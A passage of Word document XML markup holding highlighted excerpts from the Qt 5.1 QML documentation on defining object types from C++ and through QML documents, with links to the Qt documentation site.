        <w:t>values are declared within different component scopes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scope and Naming Resolution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00297A80">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="225" w:name="defining-object-types-from-c"/>
      <w:bookmarkStart w:id="226" w:name="_Toc483000580"/>
      <w:bookmarkStart w:id="227" w:name="_Toc483003601"/>
      <w:bookmarkStart w:id="228" w:name="_Toc483603932"/>
      <w:bookmarkStart w:id="229" w:name="_Toc483605152"/>
      <w:bookmarkEnd w:id="225"/>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Object Types from C++</w:t>
      </w:r>
      <w:bookmarkEnd w:id="226"/>
      <w:bookmarkEnd w:id="227"/>
      <w:bookmarkEnd w:id="228"/>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">C++ plugin writers and application developers may register types defined in C++ through API provided by the Qt QML module. There are </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>various registration functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">which each allow </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>different use-cases to be fulfilled</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For more information about those registration functions, and the specifics of exposing custom C++ types to QML, see the documentation regarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining QML Types from C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00825931" w:rsidRPr="00187F1A" w:rsidRDefault="00AD197D" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The QML type-system relies on imports, plugins and extensions being installed</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a known import path. </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Plugins may be provided by third-party developers and reused by client application developers</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Please see the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId158" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML modules</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information about how to create and deploy a QML extension module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00B307B1" w:rsidRDefault="00187F1A" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00B307B1" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId159" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>project</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-5.1/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>documents</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>definetypes</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00944C21">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc483000581"/>
      <w:bookmarkStart w:id="231" w:name="_Toc483003602"/>
      <w:bookmarkStart w:id="232" w:name="_Toc483603933"/>
      <w:bookmarkStart w:id="233" w:name="_Toc483605153"/>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Object Types through QML Documents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
      <w:bookmarkEnd w:id="231"/>
      <w:bookmarkEnd w:id="232"/>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F640F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>One of the core features of QML is that it enables QML object types to be easily defined in a lightweight manner through QML documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to suit the needs of individual QML applications. The standard</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId160" w:history="1">
        <w:r w:rsidRPr="003F640F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003F640F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F640F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module provides</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> various types like</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId161" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId162" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId163" w:anchor="image" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for building a QML application; beyond these, you can easily define your own QML types to be reused within your application. </w:t>
      </w:r>
      <w:r w:rsidRPr="003F640F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This ability to create your own types forms the building blocks of any QML application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00944C21">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="defining-an-object-type-with-a-qml-file"/>
      <w:bookmarkStart w:id="235" w:name="_Toc483000582"/>
      <w:bookmarkStart w:id="236" w:name="_Toc483003603"/>
      <w:bookmarkStart w:id="237" w:name="_Toc483603934"/>
      <w:bookmarkStart w:id="238" w:name="_Toc483605154"/>
      <w:bookmarkEnd w:id="234"/>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining an Object Type with a QML File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
      <w:bookmarkEnd w:id="236"/>
      <w:bookmarkEnd w:id="237"/>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
